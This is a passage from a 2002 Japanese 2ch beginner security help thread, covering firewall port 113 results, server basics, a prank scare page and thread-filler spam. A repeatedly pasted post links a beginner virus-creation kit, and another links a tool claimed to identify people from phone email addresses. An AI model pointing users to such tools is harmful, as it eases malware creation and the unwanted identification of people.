ほかのアンチウイルスソフトでの検出名を教えてくださいませませ。
文化放送ではありません。

http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
http://www.symantec.com/avcenter/reference/heuristc.pdf

http://www.trendmicro.co.jp/vinfo/virusencyclo/default2.asp?m=q&virus=empire&alt=empire
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=FILESTRING.DA

初心者向けウイルス作成ソフト
http://vx.netlux.org/dat/vct.shtml

929 :名無しさん@お腹いっぱい。:02/02/05 22:09
>>924
探し方が甘いつか、コンパネのインターネットオプションは殆ど
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
の下

930 :名無しさん@お腹いっぱい。:02/02/05 22:10
>>927
ワークステーションを最初に定義(提唱)したのはHPのAltoじゃなかったっけ?
Alto:Workstation=x:Serverのつもりで書いた。
間違ってたらスマソ。

931 :ピンク:02/02/05 22:17
923様
有難うございます。
しかしサーバーにも色々あるようですね。
用語辞典等で調べてもチンプンカンプンです。
とても理解できません。
例えば自分作ったホームページをどこかのサーバーにアップするのが
普通だと思うのですが、自分のPCでサーバーを立てれば自分のPCに人が
アクセスしてみてくれるんですか?

932 :名無しさん@お腹いっぱい。:02/02/05 22:26
>>930
そりゃPARCはPalo Atlo Research CenterだがAltoとは呼ばない。
PARCで作られた世界初のワークステーションがALTO。
PARCはXEROXだ。

933 :名無しさん@お腹いっぱい。:02/02/05 22:47
>>932
ええ、おっしゃる通り。HPじゃないしAltoじゃないや。スマソ。
だったら、こんなしょぼくれた酔っ払いが教える代わりにあなたが教えてあげてよ。

>>931
サーバーは「みかん」と一緒。同じ言葉でも異なった側面を持ってる。
>>931に出てくる二つのサーバーという言葉はそれぞれ異なった意味を持っている。
前者は(概念としての)サーバー、後者はサーバー(アプリケーション)をさしている。
サーバーアプリケーションを立てれば外部から見ることは可能だが、
フレッツだとか動的にIPを割り振られる場合はあまりお勧めできない。

934 :名無しさん@お腹いっぱい。:02/02/05 22:56
>>931
サーバーってのは、文字通りサービスを行っているものって意味ですので
ある時はマシンを指し、ある時はソフトを指し、ある時はその両方を含めた
総合的 (あやふや) な意味で使われたりします。

一度 Pentium 100MHz を搭載したような古いマシンを調達して FreeBSD でも入れ、
Apache とか入れて実際に設定をしてみたらどうでしょうか。(私はそうしました)
'いっちょ噛み' はヘタすると、かえって混乱する事になると思いますよ。

> 自分のPCでサーバーを立てれば自分のPCに人がアクセス
環境によってですが、相手にパブリックな IP を教えれば、
そういった事ができるようになると思います。
手軽にやるなら QuickFTPD とか AnHTTPd とかなのでしょうかね。

まぁ、そもそもこういう所で聞く問題じゃありませんし、
色々と大変でしょうが頑張って下さい。


935 :名無しさん@お腹いっぱい。:02/02/06 03:14
変なファイル(女の人の顔が出てきてキャーっていう)をダウンロードしてしまいまして
怖いので削除したいのですが、「このファイルはWindowsで使用されてるので削除
できません」と言われました。どうしたらいいですか?怖いです たすけて

936 :名無しさん@お腹いっぱい。 :02/02/06 03:54
http://www.top.or.jp/~godhand/a2.html
というHPを開いたら勝手になにかダウンロードさせられました。
わけがわからないです。
いったい何なのか教えてください。

937 :名無しさん@お腹いっぱい。:02/02/06 03:55
>>935
いいかげんにしとけよ わらい
マルチしまくりか?

http://pc.2ch.net/test/read.cgi/sec/1009795619/818
http://pc.2ch.net/test/read.cgi/hack/1012834234/155
http://pc.2ch.net/test/read.cgi/sec/1010952801/935



938 :名無しさん@お腹いっぱい。:02/02/06 03:58
>>936
それたしかジョーク(たちの悪い)だったと思う。

939 :検出名を教えてくださいませませ:02/02/06 04:12
ウイルス205種
http://www.ebcvg.com/binary.php
Empire248はBloodhoundFileString(左端の上から6番目)
未知のウイルス名称決定
このウイルス検出名はVCL_MUT.Empire.248となりました。

ほかのアンチウイルスソフトでの検出名を教えてくださいませませ。
文化放送ではありません。

http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
http://www.symantec.com/avcenter/reference/heuristc.pdf

http://www.trendmicro.co.jp/vinfo/virusencyclo/default2.asp?m=q&virus=empire&alt=empire
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=FILESTRING.DA

初心者向けウイルス作成ソフト
http://vx.netlux.org/dat/vct.shtml

940 : 1000!!!!!取り合戦開始!:02/02/06 04:13


941 :名無しさん@お腹いっぱい。:02/02/06 04:19
>>939
コピペはウィルススレだけにしろな。

☆ウィルス情報&質問 総合スレッド☆
http://pc.2ch.net/test/read.cgi/sec/1010948022/

942 :名無しさん@お腹いっぱい。:02/02/06 11:42
認証サービスpassportを利用する上で、具体的にどのような危険が考えられるでしょうか?
普通に運用されている場合、お店に悪意がある場合、MSがポカやった場合など、それぞれ。


943 :名無しさん@お腹いっぱい。:02/02/06 13:51
>>936
今まで見る気になれなかったが初めてソースを見た。
なんだかなあ、作ってるところ想像すると怖いような哀れなような。
こういう質問を見て楽しいんだろうなあ。

944 :名無しさん@お腹いっぱい。:02/02/06 19:47
>>943
たぶん最初に2chにリンク貼ったやつが作者なんだろーねー。


945 :名無しさん@お腹いっぱい。:02/02/06 21:54
Shields UP!でポートのチェックをしたら、113がclosedで他はステルスでした。
ネットワークのことはよく分からないので、説明の意味がよく分かりませんでした。
多分、日本語でも意味不明かも。。。
このポートをステルスにするにはどうすればいいんでしょうか?

ブロードバンドルーター+zonealarm最新版使ってまして、この辺りの設定を
すればいいと思うんですけど、、、
ルーターのセキュリティ関連はデフォルトのままで、DHCPでクライアントIPアドレス
を設定してます。
zonealarmもほぼデフォですけど、セキュリティ項目のadvancedで、ルーターの
DHCPで使うIPアドレスの範囲を、ローカルとして認識するようにしてます。
ルーターのIPアドレスもローカルとして認識するようにしています。


946 :検出名を教えてくださいませませ:02/02/06 23:05
>>941
いや。

>>943
赤い文字だけで何もないが? 

947 :cheshire-cat:02/02/06 23:17
>>945
腹下して調子悪いんで、簡潔に。

ステルス→自分は存在しないよん
クローズ→ブロックしました
だもんで、ステルスの方がイイ

113はident。普通、関係ない。無視。

うち、DHCP結局使わないことになったから、それについてはコメントしたくない、ちょい自信失ったんで。
ルーターでフィルタリングすればいいじゃん、PFW以前に。

948 :名無しさん@お腹いっぱい。:02/02/06 23:24
>>947
あるポートで「自分は存在しないよん」っていってても、別のポートで
「ブロックしました」だったら結局存在してるのばればれなんだよね(笑)

949 : :02/02/06 23:25
くだらねぇ質問はここに書き込め Ver2.13
http://pc.2ch.net/test/read.cgi/sec/1009795619/l50

950 :cheshire-cat:02/02/06 23:26
あ、でも行儀の悪いプロバだと、identをフィルタリングするとメールの受信が困難になるかもしれない。

951 :945:02/02/06 23:28
>>947

れすサンクスです。
関係ない、ってことは、ルーターでこのポートを完全に閉じてしまっても
問題ないっていうことでしょうか?
ウチでは、外部に公開するようなサーバー、例えばWEBとかは一切立てていないし、
必要ないです。
ただ、WINXP(HOME)とWIN2000でLAN組んでるんですけど、ただの端末と
して使うけど、ネット接続のために裏で稼動しているサーバーソフトが
コイツに関係あったりすることはないでしょうかね??
そもそも、前は全部ステルスだったのに、なんでこのポートが見えるように
なったのか分からないです。
詳しくないのでアレなんですが、ポートが見えるということは、
そのポートを利用するサーバーが起動している、というコトでは
ないのでしょうか?

立て続けに沢山の質問をばしてしまいましたが、識者の方、
よろしくおねがいしますです。

952 :945:02/02/06 23:29
追加ですが、変わったことといえば、ルーター付属のプリンタサーバー
を使うようにしたことくらいですかね。

953 :cheshire-cat:02/02/06 23:38
>>948
ごもっとも。

メールの送受信の際に、「このIPアドレスは生きているのかな、ど〜れ」なんて試す奴がいるけど、そういうんじゃなければ、塞いでもOK。

Portが開いている=そのサービスが(必ず)生きている、ではない。
起動しないのに開いているポートもWin95で実験したらあったし(何かは忘れた、昔の話しだから)。

>ルーター付属のプリンタサーバー
停止して実験して、結果報告してほしい。
こういうのが積み重なって、回りまわってみんなの知識が増えるんだから。

954 :名無しさん@お腹いっぱい。:02/02/06 23:52
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/l50

次スレ立てました
徐々に移行していってください

955 :名無しさん@お腹いっぱい。:02/02/07 00:00
このスレは進行が遅いから990ぐらいで
新スレ立てたほうが良かったと思われ

956 :(゜▼゜*):02/02/07 00:00
>>953
ちなみにIRCチャットサーバやFTPサーバでも、
IDENTフィルタリングするとタイムアウトまで
待たされるやつあります。

957 :名無しさん@お腹いっぱい。:02/02/07 00:02
>>955
990はちと遅いかもしんない。970ぐらいでいいか。

958 :945:02/02/07 00:19
プリントサーバをはずして、ローカルプリンタに戻してみました。
依然、113はclosedということで、閉まってはいるものの、丸見えです。
どうやら、プリントサーバは関係なかった模様。
どっちにしても、プリンタは外部に公開していない(つもり)ので
関係ないと思ってはいましたけど・・・

で、ルーターで113をフィルタリングしてから再度試したけど、
closedです。なんで??
ワケわからんようになってきましたです、ハイ・・・

この状態でメールチェックしたところ、問題なくメールサーバーに
アクセスできました。

皆さんの113はどうなってます?
ステルスになってる?


959 :cheshire-cat:02/02/07 01:18
>>958
気になって再度試したけど、ステルスだったよ。
フィルタリングの件だけど。それってルーターでブロックしたの意味で、ぞぬで解決したという訳じゃないんだから。
書き方が変だったんで誤解与えた?
現状では、113にポートスキャンかけられなければ、あるIPアドレスにWebにつないでいるNodeの存在に気づかれないということなんだから、さほど問題はないと思うよ。
それにルーターで蹴っているんだから。

原因はわからないけど、面白いケースだと。
理由がわかったら、教えて欲しい。知りたい〜

腹下して具合悪いんで、寝る。正露丸効かなくてウツ。

960 :名無しさん@お腹いっぱい。:02/02/07 19:13
あるURLを開いたために、「石の仮面」のような画像がアップで出るようになりました。
出現割合はランダムで、インターネットを見てたりやその他ソフトを立ち上げているときに突然現れるんです。
同じような経験がある人はいませんか?もしかしてウィルス?
かなり、キモイので対処方法を是非教えてください!!

961 :検出名を教えてくださいませませ:02/02/08 01:19
ウイルス205種
http://www.ebcvg.com/binary.php
Empire248はBloodhoundFileString(左端の上から6番目)
未知のウイルス名称決定
このウイルス検出名はVCL_MUT.Empire.248となりました。

ほかのアンチウイルスソフトでの検出名を教えてくださいませませ。
文化放送ではありません。

http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
http://www.symantec.com/avcenter/reference/heuristc.pdf

http://www.trendmicro.co.jp/vinfo/virusencyclo/default2.asp?m=q&virus=empire&alt=empire
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=FILESTRING.DA

初心者向けウイルス作成ソフト
http://vx.netlux.org/dat/vct.shtml


962 : 1000!!!!!取り合戦開始!:02/02/08 01:20


963 :埋め立て屋:02/02/10 22:09
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/1-7

964 :眠人:02/02/15 06:25
http://muvc.net/getfile/index.html

NO1 激X10 who version 1.1 携帯のメールアドレスから個人を特定するTOOL。使ったことないですが凄そう。自己防衛のために使ってください。 ダウンロード


↑GIF貼ってますけど…誰か破れますか?

965 :名無しさん@お腹いっぱい。:02/02/16 02:47
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/

966 :埋め立て屋:02/02/20 14:10
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/1-7

967 :1000!!!!!!取り合戦開始!:02/02/25 00:20
まもなくここは 乂1000取り合戦場乂 となります。

      \∧_ヘ     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 ,,、,、,,, / \〇ノゝ∩ < 1000取り合戦、いくぞゴルァ!!       ,,、,、,,,
    /三√ ゚Д゚) /   \____________  ,,、,、,,,
     /三/| ゚U゚|\      ,,、,、,,,                       ,,、,、,,,
 ,,、,、,,, U (:::::::::::)  ,,、,、,,,         \オーーーーーーーッ!!/
      //三/|三|\     ∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
      ∪  ∪       (    )    (     )   (    )    )
 ,,、,、,,,       ,,、,、,,,  ∧_∧∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
      ,,、,、,,,       (    )    (    )    (    )    (    )


968 :名無しさん@お腹いっぱい。:02/02/25 00:42
ADSLはどこが良いのでしょうか?
安いので ヤフーBB にしようかと思うのですが
評判はどうなのでしょうか?

969 : :02/02/25 01:05
>>968
評判?
知らないほうがいいかも(プ

970 :名無しさん@お腹いっぱい。:02/02/25 01:12
>>968
プロバイダー板逝け。

971 :名無しさん@お腹いっぱい。:02/02/25 02:19
>>968
せっかく来たんだから
http://pc.2ch.net/test/read.cgi/sec/1005443942/l50は見てけ。

972 :名無しさん@お腹いっぱい。:02/02/25 09:15
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/


973 :973:02/02/25 10:19
973:Over 972 Thread
このスレッドは972を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。





974 :名無しさん@お腹いっぱい。:02/02/25 11:10
うそつき!書けるもん!

975 :埋め立て屋:02/02/26 05:49
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/


976 :埋め立て屋:02/02/26 05:49
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/


977 :埋め立て屋:02/02/26 05:49
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/


978 :埋め立て屋:02/02/26 05:49
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/


979 :埋め立て屋:02/02/26 05:49
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/


980 :埋め立て屋:02/02/26 05:49
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/


981 :埋め立て屋:02/02/26 05:49
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/


982 :埋め立て屋:02/02/26 05:50
新しいスレへ移動して下さい。

983 :埋め立て屋 ◆NA.UMERU :02/02/26 05:51
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/1-7

275 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)